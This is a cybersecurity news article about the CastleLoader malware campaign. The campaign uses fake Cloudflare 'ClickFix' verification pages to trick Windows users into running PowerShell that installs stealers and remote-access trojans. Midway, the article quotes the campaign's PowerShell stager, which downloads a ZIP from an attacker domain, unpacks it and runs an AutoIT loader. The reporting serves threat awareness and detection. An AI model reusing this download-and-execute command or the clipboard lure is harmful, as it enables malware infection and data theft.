New CastleLoader Attack Using Cloudflare-Themed Clickfix Technique to Infect Windows Computers

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

CastleLoader, a rapidly evolving loader discovered in 2025, has surged across underground networks by weaponizing Cloudflare-themed “Clickfix” phishing pages and doctored GitHub repositories to compromise Windows hosts.

The malware masquerades as benign developer resources, browser updates, or meeting portals, luring unsuspecting users into copying a seemingly innocent PowerShell command that promises to “verify” or “repair” site access.

Once executed, that single line silently pulls CastleLoader onto the machine, opening the door to information-stealers such as StealC and RedLine as well as remote-access trojans like NetSupport RAT and SectopRAT.

The scope of the threat is significant: between May and July 2025 researchers recorded 1,634 malware-download attempts and 469 confirmed infections—an alarming 28.7% success rate among users who clicked the malicious links.

Catalyst analysts identified at least seven distinct command-and-control (C2) servers coordinating these campaigns, several of which targeted government networks in the United States.

In every observed wave, CastleLoader served as the common delivery hub, dynamically selecting secondary payloads according to each victim’s profile.

CastleLoader’s attack chain and distribution mechanism (Source – Catalyst)

Catalyst researchers noted that the platform’s web-based C2 panel mirrors a malware-as-a-service dashboard, complete with statistics, geographic filters, and one-click redeployment to already compromised systems.

Operators upload new binaries to a “Delivery” module and then craft tasks that embed PowerShell inlined into URL parameters, allowing campaign changes without touching the host sites.

The result is a resilient infrastructure that frustrates take-downs while letting attackers iterate within minutes.

Inside the Clickfix Infection Mechanism

The hallmark of CastleLoader is its clipboard-poisoning “Clickfix” routine. When a victim loads the fake Cloudflare verification page, embedded JavaScript silently issues /s.php?an=0 to retrieve a Base64-encoded PowerShell payload and copies it to the clipboard via unsecuredCopyToClipboard().

CastleLoader attack chain using the ClickFix technique (Source – Catalyst)

Users obey on-screen instructions to paste the code into the Windows Run dialog, triggering the next stage:-

# Snippet excerpted from teamsi.org campaign
[System.Guid]$GDSGFBKSD = [System.Guid]::NewGuid().ToString();
$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;
Invoke-WebRequest 'https://teamsap[.]org/s.php?an=2' -OutFile "$env:MYAPPDATA$GDSGFBKSD.zip";
Expand-Archive "$env:MYAPPDATA$GDSGFBKSD.zip" -DestinationPath "$env:MYAPPDATA";
& "$env:MYAPPDATAloader.au3";

This script fetches a campaign-specific ZIP, unpacks an AutoIT loader, and executes shellcode that resolves hashed API names before contacting the C2 over HTTPS to fetch a final payload.

By staging downloads through legitimate-looking domains and legitimate tooling (AutoIT), CastleLoader sidesteps many content filters while leaving minimal disk artefacts.

Further persistence is optional but potent: the C2 can instruct hijacked hosts to create scheduled tasks, inject DLLs into trusted processes, or repeatedly rerun payloads whenever a user logs on.

Because tasks are loaded from the server in real time, defenders cannot rely on static indicators, instead, behavioral detection that flags clipboard manipulation followed by outbound PowerShell traffic offers the best chance of early disruption.

Experience faster, more accurate phishing detection and enhanced protection for your business with real-time sandbox analysis-> Try ANY.RUN now